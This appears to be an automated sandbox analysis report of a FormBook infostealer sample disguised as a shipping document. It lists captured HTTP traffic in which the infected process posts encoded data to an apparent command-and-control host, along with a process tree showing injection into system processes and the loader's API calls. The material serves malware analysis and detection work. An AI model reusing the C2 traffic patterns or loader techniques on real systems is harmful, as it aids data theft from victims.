30 47 30 72 4b 61 77 58 69 75 58 4f 78 55 65 4f 36 79 69 72 36 37 64 41 4b 45 79 51 4d 63 67 58 41 66 57 6b 74 73 46 31 46 77 7a 46 51 54 75 41 56 75 4d 79 69 67 42 31 79 53 59 35 65 36 39 45 72 67 36 72 38 74 41 46 4d 55 4f 78 76 33 67 4b 39 52 41 79 33 70 79 38 50 62 53 39 65 38 73 4d 4d 79 55 48 52 59 33 63 55 6c 58 6c 64 41 6a 63 46 39 49 59 6d 2f 6e 6a 74 35 5a 42 6d 78 72 37 47 70 55 5a 30 36 74 41 6a 47 43 51 42 62 51 75 45 41 51 38 55 52 52 46 54 46 32 30 48 56 70 58 4d 65 42 34 65 55 73 33 73 31 2f 71 6e 34 39 67 53 71 67 3d Data Ascii: Ir8HUj=JB6K6oyIdLi5koAYPoSyn8Zjr7uI/PrJOXLT0G0rKawXiuXOxUeO6yir67dAKEyQMcgXAfWktsF1FwzFQTuAVuMyigB1ySY5e69Erg6r8tAFMUOxv3gK9RAy3py8PbS9e8sMMyUHRY3cUlXldAjcF9IYm/njt5ZBmxr7GpUZ06tAjGCQBbQuEAQ8URRFTF20HVpXMeB4eUs3s1/qn49gSqg=
Nov 11, 2024 08:34:52.071635962 CET	686	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 07:34:51 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Content-Encoding: br Data Raw: 31 62 63 0d 0a a1 10 1a 00 20 93 6e 39 ad b9 d4 c8 11 c5 03 1f 6a 3e f5 b7 6a f4 4d a0 62 03 e7 44 9d e8 54 23 1b 7c b3 e4 c4 01 4f b8 3c ea 66 07 3b e8 6d ae d9 b3 3f 41 ea c1 31 b7 46 20 5d 12 98 b6 d3 43 ad 56 00 3f a9 68 cf 30 c9 b4 ef e8 b4 83 a0 1d b0 1b 33 e5 db b9 94 7e 85 91 d3 45 0e e0 94 57 8f cf 8d f3 43 86 45 94 22 36 c2 46 90 2a e3 dd 81 c3 92 76 58 14 08 fd 43 dc f7 ff 53 24 ae fc 57 84 7e e1 5a 71 ea f1 19 3b 25 94 da 35 9a d6 f5 fd 7d 29 14 fd a5 bf a7 7f b1 da 2a 75 bc dd ea ef 43 1d be 16 cc 63 af 20 c4 41 f1 26 0c dc fb b6 37 21 8e 91 8f 55 24 8a d6 3d 86 e7 43 c8 61 0d 21 8a 2f 8e 12 68 10 89 62 d9 65 6f 48 e8 7f bd 3d ad 00 fa 0f 18 8a 3c 37 5a 3a 2e b5 10 89 cb 64 51 d9 22 cd 4b e9 4c 2e b9 c9 20 c2 c6 e6 b5 ac d2 2c b3 89 f7 be 2a 6c 2a 65 56 49 9e cb 24 af 72 93 c9 50 f1 01 b2 8f 79 99 ea 24 24 65 e6 d3 cc 4a 2e 1c cf 52 9b 0b c9 bd 28 ad cc c2 88 1b b7 b2 db 46 4f 00 53 0a be be f6 be eb 15 8c 91 86 08 76 fe f8 fc 81 3a 6f b7 df eb 3e b2 38 c1 1a 1b 84 62 d8 80 c8 fc 50 0d [TRUNCATED] Data Ascii: 1bc n9j>jMbDT#\|O<f;m?A1F ]CV?h03~EWCE"6FvXCS$W~Zq;%5})uCc A&7!U$=Ca!/hbeoH=<7Z:.dQ"KL. ,leVI$rPy$$eJ.R(FOSv:o>8bPyK$iuaw\1cxrDa% .p-~n"3J%-e(5`JF([J3qf0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	50061	185.27.134.144	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:34:54.062510014 CET	10901	OUT	POST /04fb/ HTTP/1.1 Host: www.hasthosting.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.hasthosting.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10303 Referer: http://www.hasthosting.xyz/04fb/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 4a 42 36 4b 36 6f 79 49 64 4c 69 35 6b 6f 41 59 50 6f 53 79 6e 38 5a 6a 72 37 75 49 2f 50 72 4a 4f 58 4c 54 30 47 30 72 4b 61 34 58 69 62 44 4f 2b 58 6d 4f 35 79 69 72 6d 4c 64 42 4b 45 79 42 4d 63 6f 54 41 66 4b 53 74 6f 31 31 58 44 72 46 41 79 75 41 63 75 4d 79 2b 51 42 4f 74 43 59 67 65 38 64 49 72 67 71 72 38 74 41 46 4d 53 4b 78 6d 47 67 4b 74 68 41 78 77 70 79 34 4c 62 53 46 65 38 46 7a 4d 79 51 58 52 6f 58 63 55 46 48 6c 47 54 4c 63 4a 39 49 65 6a 2f 6d 32 74 35 56 43 6d 78 6d 49 47 6f 51 67 30 39 6c 41 70 41 4b 4f 61 4b 34 73 48 67 42 6d 48 44 4e 61 65 56 2b 44 41 33 68 5a 4e 4d 6c 4e 4c 56 49 31 6d 58 61 32 6c 4a 78 37 52 61 6c 7a 42 49 32 62 4c 57 68 62 58 36 70 6e 73 45 6e 50 64 2f 4b 41 73 74 43 55 50 79 2f 4c 4b 35 5a 34 79 41 58 47 72 57 61 46 75 59 66 53 73 6d 2f 71 31 51 54 4f 56 58 62 62 69 2f 79 38 78 76 5a 77 56 71 79 43 62 30 69 6f 54 57 75 36 58 44 5a 41 4d 32 73 54 74 7a 4e 4e 58 44 7a 44 51 39 47 4f 47 4c 56 4a 6f 34 64 2b 75 2f 34 66 6c 68 73 69 79 33 44 [TRUNCATED] Data Ascii: Ir8HUj=JB6K6oyIdLi5koAYPoSyn8Zjr7uI/PrJOXLT0G0rKa4XibDO+XmO5yirmLdBKEyBMcoTAfKSto11XDrFAyuAcuMy+QBOtCYge8dIrgqr8tAFMSKxmGgKthAxwpy4LbSFe8FzMyQXRoXcUFHlGTLcJ9Iej/m2t5VCmxmIGoQg09lApAKOaK4sHgBmHDNaeV+DA3hZNMlNLVI1mXa2lJx7RalzBI2bLWhbX6pnsEnPd/KAstCUPy/LK5Z4yAXGrWaFuYfSsm/q1QTOVXbbi/y8xvZwVqyCb0ioTWu6XDZAM2sTtzNNXDzDQ9GOGLVJo4d+u/4flhsiy3DZDuCA22sYe9jg28HUFQFBcRpNCzhwb/A+30vEFuNtPMjqjNnelOFUqBoyr3CcRFm5tK9bbf4cub59YvGDqxcMsRICczyM0bEbW/ynnalzKGEGbchbFLyslTJsa8tZa90PSdKCyFDDq3PBXNlOOK0aGKSYEmxnuQLQbavZiL07NPm0Z0pdilAEnYSodJYLHBjZsb/OuAkRSveGhFjjbNb3ruzL4kPPfz7xXi4Op7N4b6+OEOnYGGh53pq1p98FVrzuxvyBey5D2IvUOsXika/QHatzlen089GgVf3dYK9WS0nuqEx6TtrZN/oTv1nYaKBjCVFxzrt4YgD9TRzzFfSjfBSXNTJtJY7BLt9/TnLJeKVDc0soK8VjZWTuIXIFMQus7wg7J8pwSPLY5fuCIm1bwlsD49zgUHe2HvGRxzOx2YnlycDxuS85hDhJYloXCWr3Fpn0VAX7w5k3i2UGSX4ZLNMe9TQCWZ98di6wxPmf5EYWpA4ZlNR16tG062JoLN4KmvJ0iWWjX9u4uJ8a+CIaNjzlE6FovtsftW+j/wjPWnMhrJRXesQYMmoScmRms5bcKuSdpzFVMKzaHR1GuGUe5JnDdjLKK8vvHGfmtHMRqGMPhzUci3B5ZuqcVylmuJMNIK7yUoYgwlvKT5E/iISNhaUNHRu7UL7ie [TRUNCATED]
Nov 11, 2024 08:34:54.614506006 CET	686	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 07:34:54 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Content-Encoding: br Data Raw: 31 62 63 0d 0a a1 10 1a 00 20 93 6e 39 ad b9 d4 c8 11 c5 03 1f 6a 3e f5 b7 6a f4 4d a0 62 03 e7 44 9d e8 54 23 1b 7c b3 e4 c4 01 4f b8 3c ea 66 07 3b e8 6d ae d9 b3 3f 41 ea c1 31 b7 46 20 5d 12 98 b6 d3 43 ad 56 00 3f a9 68 cf 30 c9 b4 ef e8 b4 83 a0 1d b0 1b 33 e5 db b9 94 7e 85 91 d3 45 0e e0 94 57 8f cf 8d f3 43 86 45 94 22 36 c2 46 90 2a e3 dd 81 c3 92 76 58 14 08 fd 43 dc f7 ff 53 24 ae fc 57 84 7e e1 5a 71 ea f1 19 3b 25 94 da 35 9a d6 f5 fd 7d 29 14 fd a5 bf a7 7f b1 da 2a 75 bc dd ea ef 43 1d be 16 cc 63 af 20 c4 41 f1 26 0c dc fb b6 37 21 8e 91 8f 55 24 8a d6 3d 86 e7 43 c8 61 0d 21 8a 2f 8e 12 68 10 89 62 d9 65 6f 48 e8 7f bd 3d ad 00 fa 0f 18 8a 3c 37 5a 3a 2e b5 10 89 cb 64 51 d9 22 cd 4b e9 4c 2e b9 c9 20 c2 c6 e6 b5 ac d2 2c b3 89 f7 be 2a 6c 2a 65 56 49 9e cb 24 af 72 93 c9 50 f1 01 b2 8f 79 99 ea 24 24 65 e6 d3 cc 4a 2e 1c cf 52 9b 0b c9 bd 28 ad cc c2 88 1b b7 b2 db 46 4f 00 53 0a be be f6 be eb 15 8c 91 86 08 76 fe f8 fc 81 3a 6f b7 df eb 3e b2 38 c1 1a 1b 84 62 d8 80 c8 fc 50 0d [TRUNCATED] Data Ascii: 1bc n9j>jMbDT#\|O<f;m?A1F ]CV?h03~EWCE"6FvXCS$W~Zq;%5})uCc A&7!U$=Ca!/hbeoH=<7Z:.dQ"KL. ,leVI$rPy$$eJ.R(FOSv:o>8bPyK$iuaw\1cxrDa% .p-~n"3J%-e(5`JF([J3qf0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	50062	185.27.134.144	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:34:56.601366997 CET	536	OUT	GET /04fb/?Ir8HUj=EDSq5eKeQ/yn+NstHP+aoJNwtbWo2f2aV0X8lTwCWtszw4+D6CyS4FGQqOFHTxK4f9NdVPPEgKVRXB/uQSDXYOkNzy5V1DgJAKJcxyf5ssQ9BiSUznEU9hA=&gRU0e=jXFT04FhvBZ8j0BP HTTP/1.1 Host: www.hasthosting.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 11, 2024 08:34:57.154460907 CET	1187	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 07:34:57 GMT Content-Type: text/html Content-Length: 986 Connection: close Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED] Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("073a2f274e34c901d043c5190e17c94f");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.hasthosting.xyz/04fb/?Ir8HUj=EDSq5eKeQ/yn+NstHP+aoJNwtbWo2f2aV0X8lTwCWtszw4+D6CyS4FGQqOFHTxK4f9NdVPPEgKVRXB/uQSDXYOkNzy5V1DgJAKJcxyf5ssQ9BiSUznEU9hA=&gRU0e=jXFT04FhvBZ8j0BP&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>

Target ID:	0
Start time:	02:30:53
Start date:	11/11/2024
Path:	C:\Users\user\Desktop\shipping doc_20241111.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\shipping doc_20241111.exe"
Imagebase:	0xf40000
File size:	1'601'024 bytes
MD5 hash:	A3881D5172648B6020EFE54076616FEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:30:54
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\shipping doc_20241111.exe"
Imagebase:	0x2a0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1765791231.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1765495774.0000000002FF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1765284786.0000000002540000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:30:57
Start date:	11/11/2024
Path:	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe"
Imagebase:	0x7e0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4109168636.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	02:30:59
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\AtBroker.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\AtBroker.exe"
Imagebase:	0x5c0000
File size:	68'608 bytes
MD5 hash:	D5B61959A509BDA85300781F5A829610
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4109217815.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4108005033.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4109259542.00000000043F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	02:31:12
Start date:	11/11/2024
Path:	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe"
Imagebase:	0x7e0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4110795984.00000000058A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	02:31:24
Start date:	11/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	2.2%
Signature Coverage:	4.1%
Total number of Nodes:	1706
Total number of Limit Nodes:	38

Executed Functions

Function 00F4615E Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00F4618D

Part of subcall function 00F484E7: _wcslen.LIBCMT ref: 00F484FA

GetCurrentProcess.KERNEL32(?,00FDD030,00000000,?,?), ref: 00F462A2
IsWow64Process.KERNEL32(00000000,?,?), ref: 00F462A9
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00F462D4
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F462E6
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00F462F4
FreeLibrary.KERNEL32(00000000,?,?), ref: 00F462FB
GetSystemInfo.KERNEL32(?,?,?), ref: 00F46320

Strings

GetNativeSystemInfo, xrefs: 00F462E0
|O, xrefs: 00F8442F
kernel32.dll, xrefs: 00F462CF

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: cfb3acf84f4111b0e5e292a2363ebe92a0cf82725ea5c99393957151aec32216
Instruction ID: cfe3c4de5dfed28d1b7902e77b86987d6c70db4c97b4d173f1e153327191902d
Opcode Fuzzy Hash: cfb3acf84f4111b0e5e292a2363ebe92a0cf82725ea5c99393957151aec32216
Instruction Fuzzy Hash: 97A1B73290A2D1DFCB39DBB974442D97FA46B66310B08C89AD6C1E360DD27E5508EB62

Function 00F4445D Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00F436D8,?), ref: 00F4448D
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00F436D8,?), ref: 00F444A0
GetFullPathNameW.KERNEL32(00007FFF,?,?,01011418,01011400,?,?,?,?,?,?,00F436D8,?), ref: 00F44515

Part of subcall function 00F484E7: _wcslen.LIBCMT ref: 00F484FA

Part of subcall function 00F436FB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00F4453D,01011418,?,?,?,?,?,?,?,00F436D8,?), ref: 00F4373C

SetCurrentDirectoryW.KERNEL32(?,00000001,01011418,?,?,?,?,?,?,?,00F436D8,?), ref: 00F44596
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,010059B8,00000010), ref: 00F8371C
SetCurrentDirectoryW.KERNEL32(?,01011418,?,?,?,?,?,?,?,00F436D8,?), ref: 00F83769
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,01002244,01011418,?,?,?,?,?,?,?,00F436D8), ref: 00F837F2
ShellExecuteW.SHELL32(00000000,?,?), ref: 00F837F9

Part of subcall function 00F445AE: GetSysColorBrush.USER32(0000000F), ref: 00F445B9
Part of subcall function 00F445AE: LoadCursorW.USER32(00000000,00007F00), ref: 00F445C8
Part of subcall function 00F445AE: LoadIconW.USER32(00000063), ref: 00F445DE
Part of subcall function 00F445AE: LoadIconW.USER32(000000A4), ref: 00F445F0
Part of subcall function 00F445AE: LoadIconW.USER32(000000A2), ref: 00F44602
Part of subcall function 00F445AE: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F4461A
Part of subcall function 00F445AE: RegisterClassExW.USER32(?), ref: 00F4466B

Part of subcall function 00F4468E: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F446BC
Part of subcall function 00F4468E: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F446DD
Part of subcall function 00F4468E: ShowWindow.USER32(00000000,?,?,?,?,?,?,00F436D8,?), ref: 00F446F1
Part of subcall function 00F4468E: ShowWindow.USER32(00000000,?,?,?,?,?,?,00F436D8,?), ref: 00F446FA

Part of subcall function 00F456C2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F45793

Strings

This is a third-party compiled AutoIt script., xrefs: 00F83716
runas, xrefs: 00F837ED

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 683915450-3287110873
Opcode ID: cd320b47b6dfa6163a2e62b41fdea4e108cb699e5a980dbea67a164487ecf967
Instruction ID: 896818690956f5f195e2cea4599415182b4bccc4f794d2005ce58860d8f9f3ea
Opcode Fuzzy Hash: cd320b47b6dfa6163a2e62b41fdea4e108cb699e5a980dbea67a164487ecf967
Instruction Fuzzy Hash: 375124715483426BDB15FF70DC01AAE7FA9AB85B50F04051DF9C1921A2CF3C9909FB62

Function 00F46122 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00F46A4A,?,?,00000000,00000000), ref: 00F46132
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F46A4A,?,?,00000000,00000000), ref: 00F46149
LoadResource.KERNEL32(?,00000000,?,?,00F46A4A,?,?,00000000,00000000,?,?,?,?,?,?,00F468C2), ref: 00F842F5
SizeofResource.KERNEL32(?,00000000,?,?,00F46A4A,?,?,00000000,00000000,?,?,?,?,?,?,00F468C2), ref: 00F8430A
LockResource.KERNEL32(00F46A4A,?,?,00F46A4A,?,?,00000000,00000000,?,?,?,?,?,?,00F468C2,?), ref: 00F8431D

Strings

SCRIPT, xrefs: 00F4613F

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 30834ba84653a103e6646f915f2d9eeb7f85d7eacd092a524719cacc30810f0b
Instruction ID: 324b0028f0e9aa1f75713fa8869048860b06532da0b2fd2aac9d5702ef6d2193
Opcode Fuzzy Hash: 30834ba84653a103e6646f915f2d9eeb7f85d7eacd092a524719cacc30810f0b
Instruction Fuzzy Hash: 5A11A070201305BFE7219B65DC48F277BBAEBC6B51F10456DF502D62A0DB70DC00E662

Function 00F4F054 Relevance: 21.6, APIs: 14, Instructions: 611windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00F4F107
timeGetTime.WINMM ref: 00F4F307
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F4F428
TranslateMessage.USER32(?), ref: 00F4F47B
DispatchMessageW.USER32(?), ref: 00F4F489
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F4F49F
Sleep.KERNEL32(0000000A,?,?), ref: 00F4F4B1

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 7869f20b383dd0e284fa4d620a9f32bbab555331ebbecaaa4a9d9f5252f38c27
Instruction ID: b96f2fb5d5dd5566a914659f0f596bec0a565b23d426852b19b430075f1de368
Opcode Fuzzy Hash: 7869f20b383dd0e284fa4d620a9f32bbab555331ebbecaaa4a9d9f5252f38c27
Instruction Fuzzy Hash: AF322971A04342EFEB28CF24C844FAABBE1BF45314F14852DE95987291D774E948FB92

Function 00F446FF Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00F44732
RegisterClassExW.USER32(00000030), ref: 00F4475C
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F4476D
